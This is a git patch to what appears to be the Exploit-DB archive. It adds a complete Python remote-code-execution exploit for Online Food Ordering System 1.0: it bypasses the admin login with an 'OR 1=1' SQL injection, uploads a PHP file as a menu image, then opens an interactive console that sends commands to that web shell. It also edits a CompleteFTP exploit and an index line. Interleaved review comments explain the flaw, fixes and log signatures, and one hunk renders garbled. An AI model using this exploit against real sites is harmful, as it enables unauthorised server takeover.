From 00b27610c81f3d642857e4ea899730220fef58c4 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 24 Sep 2020 05:02:05 +0000
Subject: [PATCH] DB: 2020-09-24 2 changes to exploits/shellcodes Online Food Ordering System 1.0 - Remote Code Execution
---
exploits/php/webapps/48827.txt | 94 ++++++++++++++++++++++++++++++++
exploits/windows/remote/48657.py | 6 +-
files_exploits.csv | 1 +
3 files changed, 98 insertions(+), 3 deletions(-)
create mode 100644 exploits/php/webapps/48827.txt
diff --git a/exploits/php/webapps/48827.txt b/exploits/php/webapps/48827.txt
new file mode 100644
index 000000000..8bb3260b5
--- /dev/null
+++ b/exploits/php/webapps/48827.txt
@@ -0,0 +1,94 @@ +# Exploit Title: Online Food Ordering System 1.0 - Remote Code Execution +# Google Dork: N/A +# Date: 2020-09-22 +# Exploit Author: Eren Şimşek +# Vendor Homepage: https://www.sourcecodester.com/php/14460/simple-online-food-ordering-system-using-phpmysql.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-food-ordering-system-using-php.zip +# Version: 1.0 +# Tested on: Windows/Linux - XAMPP Server +# CVE : N/A + +# Setup: pip3 install bs4 . + +# Exploit Code : + + +import requests,sys,string,random +from bs4 import BeautifulSoup + +def get_random_string(length): + letters = string.ascii_lowercase + result_str = ''.join(random.choice(letters) for i in range(length)) + return result_str + +session = requests.session() +Domain = "" +RandomFileName = get_random_string(5)+".php" +def Help(): + print("[?] Usage: python AporlorRCE.py ") + +def Upload(): + session = requests.session() + burp0_url = Domain+"/admin/ajax.php?action=save_menu" + burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/index.php?page=menu", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------21991269520298699981411767018", "Connection": "close"} + burp0_data = "-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\nRCE\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; 
name=\"status\"\r\n\r\non\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"category_id\"\r\n\r\n3\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n-----------------------------21991269520298699981411767018\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n\n\r\n-----------------------------21991269520298699981411767018--\r\n" + try: + Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data) + if Resp == "1": + print("[+] Shell Upload Success") + else: + print("[-] Shell Upload Failed") + except: + print("[-] Request Failed") + Help() + +def Login(): + burp0_url = Domain+"/admin/ajax.php?action=login" + burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} + burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"} + try: + Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data) + if Resp.text == "1": + print("[+] Login Success") + else: + print("[+] Login Failed") + except: + print("[-] Request Failed") + Help() + +def FoundMyRCE(): + global FileName + burp0_url = Domain+"/admin/index.php?page=menu" + burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} + try: + Resp = session.get(burp0_url, headers=burp0_headers) + Soup = BeautifulSoup(Resp.text, 
"html5lib") + Data = Soup.find_all("img") + for MyRCE in Data: + if RandomFileName in MyRCE["src"]: + FileName = MyRCE["src"].strip("../assets/img/") + print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/")) + except: + print("[-] Request Failed") + Help() + +def Terminal(): + while True: + Command = input("Console: ") + burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command + try: + Resp = session.get(burp0_url) + print(Resp.text) + except KeyboardInterrupt: + print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23") + except: + print("[-] Request Error") +if __name__ == "__main__": + if len(sys.argv) == 2: + Domain = sys.argv[1] + Login() + Upload() + FoundMyRCE() + Terminal() + else: + Help() \ No newline at end of file diff --git a/exploits/windows/remote/48657.py b/exploits/windows/remote/48657.py index 1509cde3f..ae9e6b47a 100755 --- a/exploits/windows/remote/48657.py +++ b/exploits/windows/remote/48657.py @@ -1,4 +1,4 @@ -# Exploit Title: CompleteFTP Professional 12.1.3 - Remote Code Execution +# Exploit Title: CompleteFTP Professional < 12.1.3 - Remote Code Execution # Date: 2020-03-11 # Exploit Author: 1F98D # Original Author: Rhino Security Labs @@ -149,7 +149,7 @@ xml_schema = """ -""".replace("<", "<").replace(">", ">").replace('"', """).strip() +""".replace("<", "<").replace(">", ">").replace('"', """).strip() # endregion # region xml_diffgram @@ -287,7 +287,7 @@ def get_uuid(sftp): def login(host, port, user, password): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - ssh.connect(host, port, user, password, look_for_keys=False) + ssh.connect(host, port, user, password, look_for_keys=False, allow_agent=False) return ssh.open_sftp() def send_command(sftp, cmd): diff --git a/files_exploits.csv b/files_exploits.csv index 304bf16a4..2f73bb785 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
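Review bot: The header block records title, vendor and version but never states the root cause, so anyone triaging this entry has to reverse it from the request bodies: `Login()` bypasses `admin/ajax.php?action=login` with a SQL tautology in both credential fields, `Upload()` sends a `.php` file as the `img` part of `action=save_menu`, and `FoundMyRCE()`/`Terminal()` show that file is then served from `/assets/img/` and executed. I would add one line under `# CVE : N/A`, e.g. `# Description: the admin login builds its SQL from unescaped POST fields (authentication bypass), and save_menu stores the uploaded "img" file under assets/img/ without validating extension or content type, so uploaded PHP is executed by the web server.` The same line should name what a vendor fix needs: prepared statements for the login query, an image extension/MIME allowlist with server-side renaming of uploads, and no script execution in the upload directory. For detection, the hunk gives the log signature directly: a `save_menu` upload whose `img` filename ends in `.php`, followed by GET requests to `/assets/img/*.php` carrying a `cmd` parameter.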
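Review bot: In `login()` the new `allow_agent=False` (with the existing `look_for_keys=False`) correctly stops Paramiko from offering the operator's own agent identities and key files to the target, but the line above it still installs `AutoAddPolicy()`, so the supplied password is sent to whatever answers at host:port without any host-key check; that trade-off deserves a comment, e.g. `# password-only auth: never offer the operator's keys or agent; note AutoAddPolicy still skips host-key verification`. The `xml_schema` hunk at `@@ -149,7 +149,7 @@` cannot be reviewed from this page, because the removed and added `.replace(...)` lines render identically here — the entity escapes in their arguments appear to have been lost in rendering, so the intended change is not visible. `login()` is shown in full; `get_uuid()` and `send_command()` lie outside the hunk.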
@@ -40651,6 +40651,7 @@ id,file,description,date,author,type,platform,port
 48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple,
 48825,exploits/multiple/webapps/48825.py,"Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution",2020-09-22,"Milad Fadavvi",webapps,multiple,
 48826,exploits/php/webapps/48826.txt,"Flatpress Add Blog 1.0.3 - Persistent Cross-Site Scripting",2020-09-22,"Alperen Ergel",webapps,php,
+48827,exploits/php/webapps/48827.txt,"Online Food Ordering System 1.0 - Remote Code Execution",2020-09-23,"Eren Şimşek",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,